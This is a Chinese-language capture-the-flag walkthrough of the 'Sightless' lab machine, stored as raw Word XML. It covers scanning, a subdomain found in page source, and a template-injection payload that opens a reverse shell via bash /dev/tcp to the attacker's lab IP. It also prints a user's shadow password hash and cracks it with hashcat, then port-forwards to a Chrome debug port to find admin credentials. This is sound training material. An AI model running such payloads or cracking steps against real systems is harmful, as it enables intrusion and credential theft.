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C33760" w14:textId="77777777" w:rsidR="00835287" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:eastAsia="sans-serif" w:hAnsi="sans-serif" w:cs="sans-serif"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:eastAsia="sans-serif" w:hAnsi="sans-serif" w:cs="sans-serif"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
        <w:t>Sightless</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771B18E7" w14:textId="60EA0723" w:rsidR="00835287" w:rsidRDefault="00B613F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:eastAsia="宋体" w:hAnsi="sans-serif" w:cs="sans-serif" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B613F4">
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:eastAsia="宋体" w:hAnsi="sans-serif" w:cs="sans-serif"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D20AB20" wp14:editId="458C0D04">
            <wp:extent cx="5274310" cy="3118485"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="794641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41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C15" w14:textId="69DC1979" w:rsidR="007B4FD7" w:rsidRDefault="007B4FD7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7B4FD7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通过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rustscan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快速扫描一下详细的信息再使用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nmap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扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5078CA51" w14:textId="1A4CBAB7" w:rsidR="007B4FD7" w:rsidRDefault="007B4FD7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7B4FD7">
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:eastAsia="宋体" w:hAnsi="sans-serif" w:cs="sans-serif"/>
          <w:noProof/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CA3C464" wp14:editId="1D111B9B">
            <wp:extent cx="5274310" cy="1531494"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="172752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209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4896" w14:textId="6E4FE8BC" w:rsidR="007B4FD7" w:rsidRDefault="0063594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发现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21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不存在匿名登录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22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也没有什么漏洞点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 xml:space="preserve"> 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去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80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打开看一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46913C0B" w14:textId="0D2A11D6" w:rsidR="00635948" w:rsidRDefault="0063594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635948">
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:eastAsia="宋体" w:hAnsi="sans-serif" w:cs="sans-serif"/>
          <w:noProof/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21FAF3CB" wp14:editId="6702CFE2">
            <wp:extent cx="5274310" cy="3481070"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="1514211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11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8362" w14:textId="576E1B98" w:rsidR="00635948" w:rsidRDefault="0063594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类似一个商业网站</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4C7371" w14:textId="0DADE01C" w:rsidR="007441BA" w:rsidRDefault="007441BA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首先查看源码有无泄漏的信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3FE213" w14:textId="6623D8CD" w:rsidR="007441BA" w:rsidRDefault="007441BA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其次进行目录扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4742F68A" w14:textId="4E7C2F74" w:rsidR="007441BA" w:rsidRDefault="007441BA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再然后使用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ffuf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进行子域名探测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAE375D" w14:textId="06977B43" w:rsidR="00151D70" w:rsidRDefault="00151D70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151D70">
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:eastAsia="宋体" w:hAnsi="sans-serif" w:cs="sans-serif"/>
          <w:noProof/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14E85AF2" wp14:editId="18C5B06A">
            <wp:extent cx="5274310" cy="3619500"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="55655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55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ED93" w14:textId="053F02AC" w:rsidR="00151D70" w:rsidRDefault="00151D70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可以看到此处存在子域名在源码中</w:t>
      </w:r>
      <w:r w:rsidR="003511A5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添加进入</w:t>
      </w:r>
      <w:r w:rsidR="003511A5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hosts</w:t>
      </w:r>
      <w:r w:rsidR="003511A5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中并访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B37E32" w14:textId="5CBBC644" w:rsidR="00144DAB" w:rsidRDefault="00144DA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drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251650560" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2AB1F745" wp14:editId="014CCF36">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>599440</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="3279775"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21454"/>
                <wp:lineTo x="21532" y="21454"/>
                <wp:lineTo x="21532" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="1932227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7804" name="图片 19322278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D076B" w14:textId="3CBE5447" w:rsidR="00144DAB" w:rsidRDefault="00144DA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lastRenderedPageBreak/>
        <w:t>网上搜索相关漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FE58CF" w14:textId="4BF1DB2C" w:rsidR="00144DAB" w:rsidRPr="00144DAB" w:rsidRDefault="00144DA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144DAB">
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:eastAsia="宋体" w:hAnsi="sans-serif" w:cs="sans-serif"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
        <w:t>{{ process.mainModule.require('child_process').exec('bash -c "bash -i &gt;&amp; /dev/tcp/10.10.16.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59</w:t>
      </w:r>
      <w:r w:rsidRPr="00144DAB">
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:eastAsia="宋体" w:hAnsi="sans-serif" w:cs="sans-serif"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
        <w:t>/444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4</w:t>
      </w:r>
      <w:r w:rsidRPr="00144DAB">
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:eastAsia="宋体" w:hAnsi="sans-serif" w:cs="sans-serif"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0&gt;&amp;1"') }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AC988C" w14:textId="502E626C" w:rsidR="00144DAB" w:rsidRDefault="00144DA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49536" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3D5FF215" wp14:editId="4FF190CC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>517525</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="3629660"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21540"/>
                <wp:lineTo x="21532" y="21540"/>
                <wp:lineTo x="21532" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="6866142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4249" name="图片 6866142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写入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payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A4F7FD" w14:textId="429A1BAD" w:rsidR="00144DAB" w:rsidRDefault="00144DA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drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251652608" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2D249BC2" wp14:editId="2FD3D392">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>600075</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="1531620"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21224"/>
                <wp:lineTo x="21532" y="21224"/>
                <wp:lineTo x="21532" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="397295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95370" name="图片 3972953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7F55B" w14:textId="303AC905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lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251651584" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="35CA7F45" wp14:editId="7AB5E9B6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-114300</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>553720</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4944165" cy="4001058"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21497"/>
                <wp:lineTo x="21556" y="21497"/>
                <wp:lineTo x="21556" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="9765118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11805" name="图片 97651180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一看就有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root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应该是在一个容器里</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F261271" w14:textId="271CEE1C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7C32A547" w14:textId="3A650E7B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20AF7692" w14:textId="778B25EC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57D7749F" w14:textId="77777777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2C1D89F3" w14:textId="77777777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4CAFC92B" w14:textId="77777777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450B1540" w14:textId="77777777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580C18B0" w14:textId="060A4E74" w:rsidR="00245BAF" w:rsidRDefault="00245BAF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.</w:t>
      </w:r>
      <w:r w:rsidR="00475575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dockerenv</w:t>
      </w:r>
      <w:r w:rsidR="00475575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也可以证明在容器里</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E0126E" w14:textId="3657ECD3" w:rsidR="00475575" w:rsidRDefault="00475575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drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251656704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="662536F6" wp14:editId="7A08B9B6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>589915</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="2743200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21450"/>
                <wp:lineTo x="21532" y="21450"/>
                <wp:lineTo x="21532" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="1268047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47435" name="图片 12680474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0F803" w14:textId="7D7372F5" w:rsidR="00475575" w:rsidRDefault="00475575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lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251657728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="510E1538" wp14:editId="3BC9710E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>590550</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="1601470"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21326"/>
                <wp:lineTo x="21532" y="21326"/>
                <wp:lineTo x="21532" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="3374874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87471" name="图片 33748747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58DC0" w14:textId="6926809D" w:rsidR="00475575" w:rsidRDefault="00475575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475575">
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:eastAsia="宋体" w:hAnsi="sans-serif" w:cs="sans-serif"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
        <w:t>michael:$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:19860:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8265D0" w14:textId="6E42BF33" w:rsidR="00475575" w:rsidRDefault="00475575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将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hash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保存在桌面的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hash.hash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中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438D53EA" w14:textId="63592689" w:rsidR="00475575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Hashcat -m 1800 hash.hash rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AE4EB7" w14:textId="45A2ABE5" w:rsid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然后等待爆破结束</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAD1779" w14:textId="4C758415" w:rsidR="001B2E9B" w:rsidRDefault="001B2E9B" w:rsidP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 xml:space="preserve">Hashcat -m 1800 hash.hash rockyou.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:eastAsia="宋体" w:hAnsi="sans-serif" w:cs="sans-serif"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
        <w:t>–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show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAD12DE" w14:textId="206E1D49" w:rsidR="001B2E9B" w:rsidRP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显示爆破得到的结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A80B51" w14:textId="7FCA39F2" w:rsidR="00475575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drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C1DFCCB" wp14:editId="3A02FC54">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>599440</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="299085"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20637"/>
                <wp:lineTo x="21532" y="20637"/>
                <wp:lineTo x="21532" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="13424317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1798" name="图片 13424317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5B2C1" w14:textId="52D44DE8" w:rsidR="00475575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1B2E9B">
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:eastAsia="宋体" w:hAnsi="sans-serif" w:cs="sans-serif"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:insaneclownposse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F502427" w14:textId="14F784C1" w:rsid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drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="76ACA412" wp14:editId="1F96FEFB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>600075</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="1431290"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21274"/>
                <wp:lineTo x="21532" y="21274"/>
                <wp:lineTo x="21532" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="4733142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14279" name="图片 4733142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4233" w14:textId="11664404" w:rsid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成功登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B29554A" w14:textId="2B0823E1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查看开放的端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A703C6" w14:textId="4CFC255E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60800" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="00326B7B" wp14:editId="7EC09C33">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>586740</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="2289175"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21390"/>
                <wp:lineTo x="21532" y="21390"/>
                <wp:lineTo x="21532" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="116653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34542" name="图片 11665345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50990" w14:textId="63438F8A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发现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8080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端口开放状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E64EDE2" w14:textId="15A768E9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lastRenderedPageBreak/>
        <w:t>将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8080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映射到本地</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC453A9" w14:textId="64D83514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7D55F8"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S</w:t>
      </w:r>
      <w:r w:rsidRPr="007D55F8">
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:eastAsia="宋体" w:hAnsi="sans-serif" w:cs="sans-serif"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
        <w:t>sh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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D55F8">
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:eastAsia="宋体" w:hAnsi="sans-serif" w:cs="sans-serif"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
        <w:t>michael@10.10.11.32 -L 8080:localhost:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48151845" w14:textId="27634781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62848" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="26BAE420" wp14:editId="1FB7387A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>586105</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="3083560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21484"/>
                <wp:lineTo x="21532" y="21484"/>
                <wp:lineTo x="21532" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="2954883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8340" name="图片 2954883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D14E6" w14:textId="77777777" w:rsid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67CCF666" w14:textId="602485ED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网上并未发现相关漏洞弱口令不存在</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3AA920" w14:textId="590ECC1B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 w:rsidRPr="007D55F8">
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:eastAsia="宋体" w:hAnsi="sans-serif" w:cs="sans-serif"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
        <w:t>ps -aux |grep chrome</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5D006C" w14:textId="4F4F713E" w:rsidR="001B2E9B" w:rsidRDefault="007D55F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存在大量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Chrome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进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D107764" w14:textId="0EA08794" w:rsidR="001B2E9B" w:rsidRDefault="009A1408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63872" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3F7DFD66" wp14:editId="52FE63E8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>586740</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="1141095"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21275"/>
                <wp:lineTo x="21532" y="21275"/>
                <wp:lineTo x="21532" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="13241073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7333" name="图片 13241073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9D6E3" w14:textId="0C9F1EEF" w:rsidR="001B2E9B" w:rsidRDefault="00EE68C0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lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251654144" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2385B86F" wp14:editId="6C684EFE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>600710</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="2109470"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21457"/>
                <wp:lineTo x="21532" y="21457"/>
                <wp:lineTo x="21532" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="173097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71997" name="图片 173097199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92F3F" w14:textId="1CE93CB4" w:rsidR="001B2E9B" w:rsidRDefault="00EE68C0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得到了用户的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flag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接下来是得到提权之后的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flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483C1E3A" w14:textId="5D37BF4B" w:rsidR="00EE68C0" w:rsidRDefault="00EE68C0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首先启动一个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python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服务器简易的用来将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LinEnum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提权辅助脚本上传并给权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BFECB3" w14:textId="2393F18A" w:rsidR="00EE68C0" w:rsidRDefault="00EE68C0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55168" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7AEAB57D" wp14:editId="78AB66FF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>586740</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4420217" cy="752580"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21327"/>
                <wp:lineTo x="21507" y="21327"/>
                <wp:lineTo x="21507" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="12231356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35626" name="图片 12231356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ECD3C" w14:textId="77777777" w:rsidR="001B2E9B" w:rsidRDefault="001B2E9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7533EBD3" w14:textId="2015C18C" w:rsidR="00475575" w:rsidRDefault="00475575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p w14:paraId="475640AF" w14:textId="01F27052" w:rsidR="00475575" w:rsidRDefault="008E7657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脚本并没有给出可以利用的漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118DB514" w14:textId="5E302716" w:rsidR="00911189" w:rsidRDefault="00911189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57216" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3597F2EC" wp14:editId="629B473C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>524425</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="1019175"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21398"/>
                <wp:lineTo x="21532" y="21398"/>
                <wp:lineTo x="21532" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="12300448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4873" name="图片 123004487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发现了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CCB922" w14:textId="31D66C96" w:rsidR="00911189" w:rsidRDefault="00911189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lastRenderedPageBreak/>
        <w:t>大端口号全部进行转发因为不确定</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374D2C43" w14:textId="70A731EB" w:rsidR="00911189" w:rsidRDefault="00911189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64896" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5932ECE5" wp14:editId="044B8EFB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1180465</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="3104515"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21472"/>
                <wp:lineTo x="21532" y="21472"/>
                <wp:lineTo x="21532" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="17933237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23715" name="图片 17933237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进入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chrome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的调试模式去访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F085DC8" w14:textId="509972D8" w:rsidR="00911189" w:rsidRDefault="00911189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</w:p>
    <w:p w14:paraId="2B68A184" w14:textId="2819E50B" w:rsidR="00911189" w:rsidRDefault="00911189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添加后看到调试页面点进去</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C735156" w14:textId="288403C0" w:rsidR="00EE45A4" w:rsidRDefault="00EE45A4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F12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可以找到用户名和密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282CE260" w14:textId="5E9C080D" w:rsidR="00EE45A4" w:rsidRDefault="00EE45A4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Admin</w:t>
      </w:r>
    </w:p>
